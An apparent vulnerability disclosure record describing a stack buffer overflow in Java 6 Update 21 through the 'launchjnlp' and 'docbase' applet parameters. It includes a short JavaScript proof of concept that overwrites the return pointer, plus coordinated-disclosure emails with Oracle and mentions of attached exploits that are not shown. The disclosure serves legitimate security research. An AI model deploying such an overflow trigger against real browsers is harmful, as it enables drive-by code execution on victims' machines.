A simple stack buffer overflow exists in SUN Java 6 Update 21 (build 1.6.0_21-b07), which is the latest available version to date. When providing a value for the "launchjnlp" through a "param" tag, the value of "docbase", also provided through a "param" tag, gets copied into a stack based buffer of static size without checking if the size of the buffer is sufficient for storing the value of "docbase". This allows overwriting of unlimited data on the stack, including the stored return pointer, which gets loaded into EIP when the function returns. This vulnerability allows code execution when a victim visits a malicious website.

Repro (crashes with EIP= 0xDEADBEEF): <script> var sBoF = str(0x188, 'A') + dword(0xDEADBEEF); asHtml = [ // '<object classid="clsid:{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBB}">', // '<object classid="clsid:{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBA}">', '<object type="application/x-java-applet">', '<param name="launchjnlp" value="1"/>', '<param name="docbase" value="' + sBoF + '"/>', 'FAIL!', '</object>' ]; document.write(asHtml.join(''));

function str(iCount, sString) { return new Array(iCount + 1).join(sString); } function dword(iValue) { for (var sString = ''; sString.length < 4;) sString += String.fromCharCode(iValue & 0xFF), iValue >>>= 8; return sString; } </script>

Message to Oracle: Hey,

<>

I'm hoping the above is sufficient for you to start your investigation. If I find some time, I plan to write a working exploit that shows code execution is indeed possible, even with ASLR+DEP enabled. Please let me know if you need any more information.

Can you please let me know if you can reproduce the issue before the end of this week and, once you have completed you investigation, when you plan to release a fix for this issue.

I will be tracking this bug at http://code.google.com/p/skylined/issues/detail?id=23. If you would like access to the information stored there and have a Google code account, let me know and I will add you to the bug.

Cheers, SkyLined

Attached is a simple exploit that works when ASLR+DEP is not enabled. Tested with:

• Windows XP sp3 en-us [5.1.2600]
• MSIE 6.0.2900.5512.xpsp_sp3_gdr.100427-1636
• MSIE 7.0.5730.13
• Java 6 Update 20 (build 1.6.0_20-b02)
• Java 6 Update 21 (build 1.6.0_21-b07)

This exploit does not work on the following platforms/browser because of ASLR/DEP: - Windows Vista - Windows 7 - MSIE 8

Message from Oracle: Hi Berend,

Thank you for bringing this issue to our attention. We are investigating and will get back to you once we complete our investigation. As always, if we confirm this to be a vulnerability, we would like to coordinate announcements with you.

Our tracking number for this issue is 18381831.

Cheers,

Chok Oracle Security Alerts

Hi Berend,

We have verified that this is a duplicate of an issue that we have addressed in our upcoming Java security update. We will inform you before we release the update so we can coordinate announcements with you.

Cheers,

Chok Oracle Security Alerts

Comment deleted

Comment deleted

Attached are two versions of Internet Exploiter 12, called iExploit12 for no apparent reason: - a minimal version that does not try to bypass mitigations such as DEP but which is only 512 bytes in size, - a more complex version, which uses information about modules loaded in MSIE to create a ret-into-libc attack to bypass DEP. An even more complex version, which uses issue 24 to try to bypass ASLR as well will not be made available until both this bug and issue 24 are published.